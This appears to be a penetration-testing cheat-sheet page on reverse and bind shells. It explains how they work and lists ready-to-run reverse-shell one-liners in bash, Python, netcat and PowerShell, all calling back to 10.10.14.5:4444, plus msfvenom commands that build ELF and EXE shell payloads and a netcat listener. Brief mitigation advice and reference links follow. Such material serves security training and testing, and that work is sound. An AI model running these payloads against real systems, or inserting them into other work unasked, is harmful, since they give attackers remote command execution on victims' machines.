Reverse Bind Shells

Overview

Reverse and bind shells are the primary methods for maintaining interactive access to compromised systems. A reverse shell connects back from the target to the attacker's listener, while a bind shell opens a listening port on the target for the attacker to connect to.

Reverse shells are preferred because they bypass inbound firewall rules, as the connection originates from the target.

Category: Shells & Payloads — Reverse shells, bind shells, and payload generation.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Reverse Bind Shells:

bash -i >& /dev/tcp/10.10.14.5/4444 0>&1

python3 -c 'import pty,socket,os;s=socket.socket();s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

nc -e /bin/sh 10.10.14.5 4444

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f

powershell -nop -c "$c=New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String );$sb2=$sb + 'PS ' + (pwd).Path + '> ';$sbt=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$c.Close()"

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe

nc -lvnp 4444

Tools & Techniques

Recommended tools for Reverse Bind Shells:

• Metasploit msfvenom: multi-platform payload generation
• Netcat: simple listener and shell connections
• Nishang: PowerShell reverse shells
• PHP reverse shells: common php-reverse-shell.php
• Socat: more powerful alternative to netcat
• Listener: nc -lvnp <port>, multi/handler via msfconsole

Prevention & Mitigation

Security recommendations to prevent Reverse Bind Shells:

• Block outbound connections with firewall rules
• Use egress filtering to limit allowed outbound ports
• Monitor for unusual outbound connections
• Restrict shell execution via AppLocker/SELinux
• Disable command-line tools on sensitive systems
• Implement application whitelisting

References

Additional resources:

• https://www.revshells.com/
• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
• https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
• https://github.com/samratashok/nishang